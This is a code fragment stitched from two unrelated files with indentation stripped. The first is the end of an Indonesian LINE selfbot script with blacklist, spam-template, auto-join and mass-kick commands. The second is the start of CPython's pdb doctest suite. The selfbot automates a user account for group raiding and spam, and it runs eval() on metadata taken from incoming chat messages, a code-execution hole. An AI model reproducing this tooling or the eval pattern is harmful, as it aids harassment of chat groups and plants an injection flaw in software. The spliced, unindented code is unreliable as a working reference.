if target not in Saints:
try:
Bots.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus bot")
except:
pass
elif cmd == "admin:on" or text.lower() == 'admin:on':
if msg._from in admin:
wait["addadmin"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "admin:expell" or text.lower() == 'admin:expell':
if msg._from in admin:
wait["delladmin"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "staff:on" or text.lower() == 'staff:on':
if msg._from in admin:
wait["addstaff"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "staff:expell" or text.lower() == 'staff:expell':
if msg._from in admin:
wait["dellstaff"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "bot:on" or text.lower() == 'bot:on':
if msg._from in admin:
wait["addbots"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "bot:expell" or text.lower() == 'bot:expell':
if msg._from in admin:
wait["dellbots"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "refresh" or text.lower() == 'refresh':
if msg._from in admin:
wait["addadmin"] = False
wait["delladmin"] = False
wait["addstaff"] = False
wait["dellstaff"] = False
wait["addbots"] = False
wait["dellbots"] = False
wait["wblacklist"] = False
wait["dblacklist"] = False
wait["Talkwblacklist"] = False
wait["Talkdblacklist"] = False
sendMention(msg.to, sender, "User ", " \nSelfbot direfresh...")
elif cmd == "contact admin" or text.lower() == 'contact admin':
if msg._from in admin:
ma = ""
for i in admin:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact staff" or text.lower() == 'contact staff':
if msg._from in admin:
ma = ""
for i in staff:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "contact bot" or text.lower() == 'contact bot':
if msg._from in admin:
ma = ""
for i in Bots:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
#===========COMMAND ON OFF============#
elif cmd == "unsend on" or text.lower() == 'unsend on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["unsend"] = True
sendMention(msg.to, sender, "「 Status Unsend 」\nUser ", "\nSilahkan unsend pesannya,\nKetik unsend off jika sudah slesai")
elif cmd == "unsend off" or text.lower() == 'unsend off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["unsend"] = False
sendMention(msg.to, sender, "「 Status Unsend 」\nUser ", " \nDeteksi unsend dinonaktifkan")
elif cmd == "timeline on" or text.lower() == 'timeline on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Timeline"] = True
sendMention(msg.to, sender, "「 Status Timeline 」\nUser ", "\nSilahkan kirim postingannya,\nKetik timeline off jika sudah slesai")
elif cmd == "timeline off" or text.lower() == 'timeline off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Timeline"] = False
sendMention(msg.to, sender, "「 Status Timeline 」\nUser ", " \nDeteksi timeline dinonaktifkan")
elif cmd == "invite on" or text.lower() == 'invite on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["invite"] = True
sendMention(msg.to, sender, "「 Status Invite 」\nUser ", "\nSilahkan kirim kontaknya,\nKetik invite off jika sudah slesai")
elif cmd == "invite off" or text.lower() == 'invite off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["invite"] = False
sendMention(msg.to, sender, "「 Status Invite 」\nUser ", " \nInvite via contact dinonaktifkan")
elif cmd == "notag on" or text.lower() == 'notag on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["mentionKick"] = True
cl.sendText(msg.to,"「 Status Notag 」\nNotag telah diaktifkan")
elif cmd == "notag off" or text.lower() == 'notag off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["mentionKick"] = False
cl.sendText(msg.to,"「 Status Notag 」\nNotag telah dinonaktifkan")
elif cmd == "contact on" or text.lower() == 'contact on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = True
sendMention(msg.to, sender, "「 Status Contact 」\nUser ", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik contact off")
elif cmd == "contact off" or text.lower() == 'contact off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["contact"] = False
cl.sendText(msg.to,"「 Status Contact 」\nDeteksi contact dinonaktifkan")
elif cmd == "respon on" or text.lower() == 'respon on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = True
cl.sendText(msg.to,"「 Status Respon 」\nAuto respon diaktifkan")
elif cmd == "respon off" or text.lower() == 'respon off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["detectMention"] = False
cl.sendText(msg.to,"「 Status Respon 」\nAuto respon dinonaktifkan")
elif cmd == "autojoin on" or text.lower() == 'autojoin on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = True
cl.sendText(msg.to,"「 Status Autojoin 」\nAutojoin telah diaktifkan")
elif cmd == "autojoin off" or text.lower() == 'autojoin off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoJoin"] = False
cl.sendText(msg.to,"「 Status Autojoin 」\nAutojoin telah dinonaktifkan")
elif cmd == "autoleave on" or text.lower() == 'autoleave on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = True
cl.sendText(msg.to,"「 Status Autoleave 」\nAutoleave telah diaktifkan")
elif cmd == "autoleave off" or text.lower() == 'autoleave off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoLeave"] = False
cl.sendText(msg.to,"「 Status Autoleave 」\nAutoleave telah dinonaktifkan")
elif cmd == "autoblock on" or text.lower() == 'autoblock on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoBlock"] = True
cl.sendText(msg.to,"「 Status Autoleave 」\nAutoleave telah diaktifkan")
elif cmd == "autoblock off" or text.lower() == 'autoblock off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoBlock"] = False
cl.sendText(msg.to,"「 Status Autoleave 」\nAutoleave telah dinonaktifkan")
elif cmd == "autoadd on" or text.lower() == 'autoadd on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = True
cl.sendText(msg.to,"「 Status Autoadd 」\nAutoadd telah diaktifkan")
elif cmd == "autoadd off" or text.lower() == 'autoadd off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoAdd"] = False
cl.sendText(msg.to,"「 Status Autoadd 」\nAutoadd telah dinonaktifkan")
elif cmd == "sticker on" or text.lower() == 'sticker on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["stickerOn"] = True
sendMention(msg.to, sender, "「 Status Sticker Check 」\n", " [ ON ]\nSilahkan kirim stickernya,\nJika sudah selesai, ketik sticker off")
elif cmd == "sticker off" or text.lower() == 'sticker off':
if wait["selfbot"] == True:
if msg._from in admin:
wait["stickerOn"] = False
cl.sendText(msg.to,"「 Status Sticker Check 」\nSticker check dinonaktifkan")
elif cmd == "jointicket on" or text.lower() == 'jointicket on':
if wait["selfbot"] == True:
if msg._from in admin:
settings["autoJoinTicket"] = True
sendMention(msg.to, sender, "「 Status Jointicket 」\nUser ", "\nSilahkan kirim link grupnya,\nJika sudah selesai, ketik jointicket off")
elif cmd == "jointicket off" or text.lower() == 'jointicket off':
if wait["selfbot"] == True:
if msg._from in admin:
settings["autoJoinTicket"] = False
cl.sendText(msg.to,"「 Status Jointicket 」\nJointicket telah dinonaktifkan")
elif cmd == "kick on":
if wait["selfbot"] == True:
if msg._from in admin:
wait["Kickallmember"] = True
cl.sendMessage(msg.to,"Status:\nDiaktifkan")
elif cmd == "kick off":
if wait["selfbot"] == True:
if msg._from in admin:
wait["Kickallmember"] = False
cl.sendMessage(msg.to,"Status:\nDinonaktifkan")
#===========COMMAND BLACKLIST============#
elif ("Talkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["Talkblacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan talkban")
except:
pass
elif ("Untalkban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["Talkblacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus talkban")
except:
pass
elif cmd == "talkban:on" or text.lower() == 'talkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkwblacklist"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "untalkban:on" or text.lower() == 'untalkban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["Talkdblacklist"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
cl.sendMessage(msg.to,"Berhasil menambahkan blacklist")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
cl.sendMessage(msg.to,"Berhasil menghapus blacklist")
except:
pass
elif cmd == "ban:on" or text.lower() == 'ban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "unban:on" or text.lower() == 'unban:on':
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
sendMention(msg.to, sender, "", "\nSilahkan kirim kontaknya,\nJika sudah selesai, ketik refresh")
elif cmd == "banlist" or text.lower() == 'banlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"「 Huray not blacklist 」")
else:
ma = ""
a = 0
for m_id in wait["blacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"「 Daftar Blacklist 」\n\n"+ma+"\nTotal「%s」Blacklist User" %(str(len(wait["blacklist"]))))
elif cmd == "talkbanlist" or text.lower() == 'talkbanlist':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["Talkblacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada Talkban user")
else:
ma = ""
a = 0
for m_id in wait["Talkblacklist"]:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"「 Daftar Talkban 」\n\n"+ma+"\nTotal「%s」Talkban User" %(str(len(wait["Talkblacklist"]))))
elif cmd == "blc" or text.lower() == 'blc':
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
cl.sendMessage(msg.to,"Tidak ada blacklist")
else:
ma = ""
for i in wait["blacklist"]:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "clearban" or text.lower() == 'clearban':
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
cl.sendMessage(msg.to,"Succes clear Blacklist is nothing...")
#===========COMMAND SET============#
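# "Set <jenis>: <teks>" stores the message template (pesan/welcome/leave/respon/spam/sider);
# "cek <jenis>" echoes the currently stored template.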
elif 'Set pesan: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set pesan: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Pesan Msg")
else:
wait["message"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nPesan Msg diganti jadi :\n\n{}".format(str(spl)))
elif 'Set welcome: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set welcome: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Welcome Msg")
else:
wait["welcome"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nWelcome Msg diganti jadi :\n\n{}".format(str(spl)))
elif 'Set leave: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set leave: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Leave Msg")
else:
wait["leave"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nLeave Msg diganti jadi :\n\n{}".format(str(spl)))
elif 'Set respon: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set respon: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Respon Msg")
else:
wait["Respontag"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nRespon Msg diganti jadi :\n\n{}".format(str(spl)))
elif 'Set spam: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set spam: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Spam")
else:
Setmain["message1"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nSpam Msg diganti jadi :\n\n{}".format(str(spl)))
elif 'Set sider: ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set sider: ','')
if spl in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti Sider Msg")
else:
wait["mention"] = spl
cl.sendMessage(msg.to, "「 Berhasil Diganti 」\nSider Msg diganti jadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek pesan":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Message 」\nPesan Msg mu :\n\n" + str(wait["message"]))
elif text.lower() == "cek welcome":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Welcome 」\nWelcome Msg mu :\n\n" + str(wait["welcome"]))
elif text.lower() == "cek leave":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Leave 」\nLeave Msg mu :\n\n" + str(wait["leave"]))
elif text.lower() == "cek respon":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Respon 」\nRespon Msg mu :\n\n" + str(wait["Respontag"]))
elif text.lower() == "cek spam":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Spam 」\nSpam Msg mu :\n\n" + str(Setmain["message1"]))
elif text.lower() == "cek sider":
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Sider 」\nSider Msg mu :\n\n" + str(wait["mention"]))
except Exception as error:
print (error)
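# Main long-poll loop: fetch up to 50 operations, advance the revision marker, and hand each operation
# to bot() on a short-lived thread.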
while True:
try:
ops = poll.singleTrace(count=50)
if ops is not None:
for op in ops:
# bot(op)
# Don't remove this line, or you'll start getting errors soon!
poll.setRevision(op.revision)
thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
#thread1.daemon = True
thread1.start()
thread1.join()
except Exception as e:
pass
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import codecs
import unittest
import subprocess
import textwrap
from contextlib import ExitStack
from io import StringIO
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
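# The doctest functions below drive Pdb through PdbTestInput, which swaps sys.stdin for a scripted
# command list and restores stdin (and the original trace function) afterwards.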
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exist
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
